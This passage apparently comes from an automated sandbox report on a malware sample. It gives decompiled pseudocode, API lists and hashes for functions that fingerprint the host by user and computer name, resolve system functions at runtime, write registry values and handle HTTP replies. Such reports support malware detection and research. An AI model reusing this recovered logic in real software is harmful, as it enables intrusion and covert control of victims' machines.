					_t42 = E010917ED( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x010959b3
0x010959b3
0x010959c3
0x010959c6
0x010959ca
0x010959d0
0x010959d5
0x010959ee
0x01095a02
0x01095a09
0x01095a10
0x01095a63
0x01095a69
0x01095a6f
0x01095aaa
0x01095ab0
0x00000000
0x00000000
0x00000000
0x01095a6f
0x01095a16
0x00000000
0x01095a1d
0x01095a2b
0x01095a2e
0x01095a31
0x01095a3d
0x01095a41
0x01095aa3
0x01095a43
0x01095a55
0x01095a93
0x01095a9e
0x01095a57
0x01095a5a
0x01095a5e
0x01095a5e
0x01095a55
0x00000000
0x01095a41
0x01095a16
0x010959da
0x010959e0
0x010959e3
0x010959e8
0x00000000
0x00000000
0x00000000
0x01095a78
0x01095a80
0x01095a85
0x01095a88
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 010959CA
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 010959DA
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01095A0C
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01095A31
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01095A51
GetLastError.KERNEL32 ref: 01095A63

Part of subcall function 010917ED: WaitForMultipleObjects.KERNEL32(00000002,01097B88,00000000,01097B88,?,?,?,01097B88,0000EA60), ref: 01091808

Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

GetLastError.KERNEL32(00000000), ref: 01095A98

Strings

@MqtNqt, xrefs: 01095A63, 01095A98

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID: @MqtNqt
API String ID: 3369646462-2883916605
Opcode ID: bddc535aa05811c63cf6744ae6280772f7900801139b5961431016448ed589b9
Instruction ID: fbe974a1bf1f9abe6cf0652ba18800550d7e2ad74b35efeb2273b29f0dcd1ce0
Opcode Fuzzy Hash: bddc535aa05811c63cf6744ae6280772f7900801139b5961431016448ed589b9
Instruction Fuzzy Hash: 4D3110B5D00309EFDF21DFA6CCD499EBBF8FB08314F1049AAE68292145D6359A45EF50

Uniqueness

Uniqueness Score: -1.00%

Function 01096DB6 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E01096DB6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x109a3dc; // 0x1b09c80
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E01091E6D();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E01091E6D();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E01095B1A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E01095B1A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E01094A9D(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x109918c;
						}
						_t70 = E010967CE(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E01096A51(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x109a348; // 0xa6d5a8
								_t102 =  *0x109a138; // 0x1097d1e
								_t28 = _t105 + 0x109bb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E01094A9D(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x1099190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E01096A51(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E0109692B(_v24);
								} else {
									_t92 =  *0x109a348; // 0xa6d5a8
									_t44 = _t92 + 0x109bc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E0109692B(_v8);
						}
						E0109692B(_v12);
					}
					E0109692B(_v16);
				}
				return _v28;
			}

0x01096dbc
0x01096dc4
0x01096dc7
0x01096dd4
0x01096dd7
0x01096dde
0x01096de5
0x01096de8
0x01096df5
0x01096df8
0x01096dfb
0x01096e00
0x01096e05
0x01096e0d
0x01096e12
0x01096e17
0x01096e1d
0x01096e21
0x01096e2a
0x01096e2e
0x01096e30
0x01096e30
0x01096e38
0x01096e3d
0x01096e42
0x01096e48
0x01096e4f
0x01096e60
0x01096e67
0x01096e79
0x01096e7e
0x01096e83
0x01096e8c
0x01096e95
0x01096e9e
0x01096eb4
0x01096eb9
0x01096ebd
0x01096ec1
0x01096ec6
0x01096ecb
0x01096ecd
0x01096ecd
0x01096ed7
0x01096ee0
0x01096ee7
0x01096f03
0x01096f07
0x01096f40
0x01096f09
0x01096f0c
0x01096f14
0x01096f25
0x01096f2d
0x01096f35
0x01096f39
0x01096f39
0x01096f07
0x01096f48
0x01096f48
0x01096f50
0x01096f50
0x01096f58
0x01096f58
0x01096f64

APIs

GetTickCount.KERNEL32 ref: 01096DCE
lstrlen.KERNEL32(00000000,00000005), ref: 01096E4F
lstrlen.KERNEL32(?), ref: 01096E60
lstrlen.KERNEL32(00000000), ref: 01096E67
lstrlenW.KERNEL32(80000002), ref: 01096E6E
lstrlen.KERNEL32(?,00000004), ref: 01096ED7
lstrlen.KERNEL32(?), ref: 01096EE0
lstrlen.KERNEL32(?), ref: 01096EE7
lstrlenW.KERNEL32(?), ref: 01096EEE

Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 7a62f9c0a8ca0e8d1f9d9bf147bcb06dc5d2cd57a170ff77f7394dec323801e7
Instruction ID: 0365628b4519f0d8e520f08255f52b335f8d2a366fd0081980bfb37ea00c8ec4
Opcode Fuzzy Hash: 7a62f9c0a8ca0e8d1f9d9bf147bcb06dc5d2cd57a170ff77f7394dec323801e7
Instruction Fuzzy Hash: 9D518D7290021AEBCF12AFA5CC68ADE7BB5FF44354F058064F954A7260DB36CA11EF90

Uniqueness

Uniqueness Score: -1.00%

Function 0109151D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0109151D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E01096A51(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x109a348; // 0xa6d5a8
					_t1 = _t23 + 0x109b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x109a348; // 0xa6d5a8
					_t2 = _t26 + 0x109b761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0109692B(_t54);
					} else {
						_t30 =  *0x109a348; // 0xa6d5a8
						_t5 = _t30 + 0x109b74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x109a348; // 0xa6d5a8
							_t7 = _t33 + 0x109b771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x109a348; // 0xa6d5a8
								_t9 = _t36 + 0x109b4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x109a348; // 0xa6d5a8
									_t11 = _t39 + 0x109b786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0109625A(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x0109152c
0x01091530
0x010915f2
0x01091536
0x01091536
0x0109153b
0x0109154e
0x01091550
0x01091555
0x0109155d
0x01091564
0x01091566
0x0109156b
0x010915ea
0x010915eb
0x0109156d
0x0109156d
0x01091572
0x0109157a
0x0109157c
0x01091581
0x00000000
0x01091583
0x01091583
0x01091588
0x01091590
0x01091592
0x01091597
0x00000000
0x01091599
0x01091599
0x0109159e
0x010915a6
0x010915a8
0x010915ad
0x00000000
0x010915af
0x010915af
0x010915b4
0x010915bc
0x010915be
0x010915c3
0x00000000
0x010915c5
0x010915cb
0x010915d0
0x010915d7
0x010915dc
0x010915e1
0x00000000
0x010915e3
0x010915e6
0x010915e6
0x010915e1
0x010915c3
0x010915ad
0x01091597
0x01091581
0x0109156b
0x01091600

APIs

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01097082,?,?,?,?,00000000,00000000), ref: 01091542
GetProcAddress.KERNEL32(00000000,7243775A), ref: 01091564
GetProcAddress.KERNEL32(00000000,614D775A), ref: 0109157A
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01091590
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010915A6
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010915BC

Part of subcall function 0109625A: memset.NTDLL ref: 010962D9

Strings

Nqt, xrefs: 01091548

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID: Nqt
API String ID: 1886625739-806837294
Opcode ID: 179a42dd990767e1f47b7b6f044424871cd8aa14aa2e5b77c2df714915915d7b
Instruction ID: fb78f2130cffe87e3c3f9377ca8b405e8424fc6eb634c010fb53464a3f288458
Opcode Fuzzy Hash: 179a42dd990767e1f47b7b6f044424871cd8aa14aa2e5b77c2df714915915d7b
Instruction Fuzzy Hash: EB213CB060070BEFDB20DF69D8B4E9ABBECFB042547058165F586C7221DB74EA09DB60

Uniqueness

Uniqueness Score: -1.00%

Function 010916DD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010916DD() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x775ec742
						_v12 = _v12 + _t11;
						_t64 = E01096A51(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0109692B(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x1093781
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x010916eb
0x010916ee
0x010916f1
0x010916f7
0x010916fc
0x01091702
0x0109170a
0x0109170d
0x01091713
0x01091718
0x01091721
0x01091725
0x01091732
0x01091736
0x01091738
0x0109173c
0x0109173f
0x0109174f
0x010917a2
0x010917a3
0x01091751
0x01091756
0x01091757
0x0109175c
0x0109175f
0x01091772
0x00000000
0x01091774
0x01091777
0x0109177c
0x0109178a
0x0109178d
0x01091793
0x01091798
0x00000000
0x0109179a
0x0109179a
0x0109179d
0x0109179d
0x01091798
0x01091772
0x010917a8
0x010917a9
0x01091718
0x010917af

APIs

GetUserNameW.ADVAPI32(00000000,0109377F), ref: 010916F1
GetComputerNameW.KERNEL32(00000000,0109377F), ref: 0109170D

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

GetUserNameW.ADVAPI32(00000000,0109377F), ref: 01091747
GetComputerNameW.KERNEL32(0109377F,775EC740), ref: 0109176A
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0109377F,00000000,01093781,00000000,00000000,?,775EC740,0109377F), ref: 0109178D

Strings

@hqt, xrefs: 0109178D

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID: @hqt
API String ID: 3850880919-2648236075
Opcode ID: bbb2095add0c24ce699f5d3f9ddb3124cb347d2d833e6f6afbf11d2b0e22efe3
Instruction ID: e80d3ae05d110111b38fa9aef31d9b97ae8c79b02b7f658de8be5f1bae913d45
Opcode Fuzzy Hash: bbb2095add0c24ce699f5d3f9ddb3124cb347d2d833e6f6afbf11d2b0e22efe3
Instruction Fuzzy Hash: E621D976E0020AFFDB11DFE9C9988EEBBBCFF84204B5044AAE641E7244D6349B44DB10

Uniqueness

Uniqueness Score: -1.00%

Function 010913E8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010913E8(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x109a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x109a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x109a2f8 = _t6;
					 *0x109a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x109a2f4 = _t7;
					if(_t7 == 0) {
						 *0x109a2f4 =  *0x109a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x010913f0
0x010913f6
0x010913fd
0x00000000
0x01091457
0x010913ff
0x01091407
0x01091414
0x01091414
0x01091454
0x00000000
0x01091454
0x01091416
0x01091416
0x0109141b
0x0109142d
0x01091432
0x01091438
0x0109143e
0x01091445
0x01091447
0x01091447
0x00000000
0x0109144e
0x01091410
0x00000000
0x00000000
0x01091412
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01091099,?), ref: 010913F0
GetVersion.KERNEL32 ref: 010913FF
GetCurrentProcessId.KERNEL32 ref: 0109141B
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01091438
GetLastError.KERNEL32 ref: 01091457

Strings

@MqtNqt, xrefs: 01091457

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MqtNqt
API String ID: 2270775618-2883916605
Opcode ID: 21620047f6fc372a31f9e9f3d88bc1f8247d8df6965a71e6270900d01bc11a80
Instruction ID: 34476fe2e0770ef8c47e4876d51310659cb1cb0a8fe2aefbdc817c41c2061863
Opcode Fuzzy Hash: 21620047f6fc372a31f9e9f3d88bc1f8247d8df6965a71e6270900d01bc11a80
Instruction Fuzzy Hash: 3CF03170740303DFDF744B29A939B143BA2B749765F104469F6E6C71D9DABA8080DB15

Uniqueness

Uniqueness Score: -1.00%

Function 01094BC4 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 01094C1E
SysAllocString.OLEAUT32(0070006F), ref: 01094C32
SysAllocString.OLEAUT32(00000000), ref: 01094C44
SysFreeString.OLEAUT32(00000000), ref: 01094CAC
SysFreeString.OLEAUT32(00000000), ref: 01094CBB
SysFreeString.OLEAUT32(00000000), ref: 01094CC6

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 12fbce3cae52d311f04a5e53de50f06a500a22c148530ab142b2af4558ad56f0
Instruction ID: 7b2186d1179fbe1c73c2dae8f6c9d2f431813bd2fce6f86bae3f2c8e105c7429
Opcode Fuzzy Hash: 12fbce3cae52d311f04a5e53de50f06a500a22c148530ab142b2af4558ad56f0
Instruction Fuzzy Hash: 9A418E32D00A09AFDF41DFFCD954ADEBBF9AF88200F104466EA51EB260DA719906CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0109202C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0109202C(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x109a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E01094881( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E01093E49(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E0109692B(_a8);
						goto L29;
					}
					_t64 =  *0x109a318; // 0x1b09dd8
					_t16 = _t64 + 0xc; // 0x1b09efa
					_t65 = E01094881(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d010990
						if(E010910C5(_t97,  *_t33, _t91, _a8,  *0x109a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x109a348; // 0xa6d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x109ba3e; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x109ba39; // 0x55434b48
								_t69 = _t34;
							}
							if(E01096DB6(_t69,  *0x109a3d4,  *0x109a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x109a348; // 0xa6d5a8
									_t44 = _t71 + 0x109b842; // 0x74666f53
									_t73 = E01094881(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d010990
										E010951C0( *_t47, _t91, _a8,  *0x109a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d010990
										E010951C0( *_t49, _t91, _t99,  *0x109a3d0, _a16);
										E0109692B(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d010990
									E010951C0( *_t40, _t91, _a8,  *0x109a3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d010990
									E010951C0( *_t43, _t91, _a8,  *0x109a3d0, _a16);
								}
								if( *_t101 != 0) {
									E0109692B(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d010990
					_t81 = E010954A0( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d010990
							E010910C5(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E0109692B(_t100);
						_t98 = _a16;
					}
					E0109692B(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E010979F1(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x109a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x0109202c
0x01092035
0x0109203c
0x01092041
0x010920ae
0x010920b4
0x010920b9
0x010920c0
0x010920c5
0x010920ca
0x01092235
0x0109223c
0x0109223c
0x01092241
0x01092243
0x01092243
0x0109224c
0x0109224c
0x010920d0
0x010920dc
0x0109222b
0x0109222e
0x00000000
0x0109222e
0x010920e2
0x010920e7
0x010920ea
0x010920ef
0x010920f4
0x0109213d
0x0109213d
0x01092150
0x0109215a
0x01092160
0x01092167
0x01092171
0x01092171
0x01092169
0x01092169
0x01092169
0x01092169
0x01092193
0x0109219b
0x010921c9
0x010921ce
0x010921d5
0x010921da
0x010921de
0x01092210
0x010921e0
0x010921ed
0x010921f0
0x01092200
0x01092203
0x01092209
0x01092209
0x0109219d
0x010921aa
0x010921ad
0x010921bf
0x010921c2
0x010921c2
0x0109221a
0x01092226
0x0109221c
0x0109221f
0x0109221f
0x0109221a
0x01092193
0x00000000
0x0109215a
0x01092103
0x01092106
0x0109210d
0x01092113
0x01092116
0x01092118
0x01092124
0x01092127
0x01092127
0x0109212d
0x01092132
0x01092132
0x01092138
0x00000000
0x01092138
0x01092046
0x00000000
0x0109206d
0x0109206d
0x01092079
0x0109208c
0x01092092
0x0109209a
0x00000000
0x0109209a

APIs

StrChrA.SHLWAPI(0109299F,0000005F,00000000,00000000,00000104), ref: 0109205F
lstrcpy.KERNEL32(?,?), ref: 0109208C

Part of subcall function 01094881: lstrlen.KERNEL32(?,00000000,01B09DD8,00000000,0109166A,01B09FFB,69B25F44,?,?,?,?,69B25F44,00000005,0109A00C,4D283A53,?), ref: 01094888
Part of subcall function 01094881: mbstowcs.NTDLL ref: 010948B1
Part of subcall function 01094881: memset.NTDLL ref: 010948C3

Part of subcall function 010951C0: lstrlenW.KERNEL32(?,?,?,010921F5,3D010990,80000002,0109299F,01096A0D,74666F53,4D4C4B48,01096A0D,?,3D010990,80000002,0109299F,?), ref: 010951E5

Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

lstrcpy.KERNEL32(?,00000000), ref: 010920AE

Strings

(, xrefs: 0109210F
\, xrefs: 01092092

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: a1915a53669c75a92c8dc489e61d38f7ec13b606b87805733013f042705a4803
Instruction ID: a957b7e7d0d3dbbb36a300097f67e9c95a3f326965efcfb44c5cf989a984d498
Opcode Fuzzy Hash: a1915a53669c75a92c8dc489e61d38f7ec13b606b87805733013f042705a4803
Instruction Fuzzy Hash: E8515A7560020AFFDF22AFA4DC60EEA3BB9FB18354F008154FA9196160D776D925EB50

Uniqueness

Uniqueness Score: -1.00%

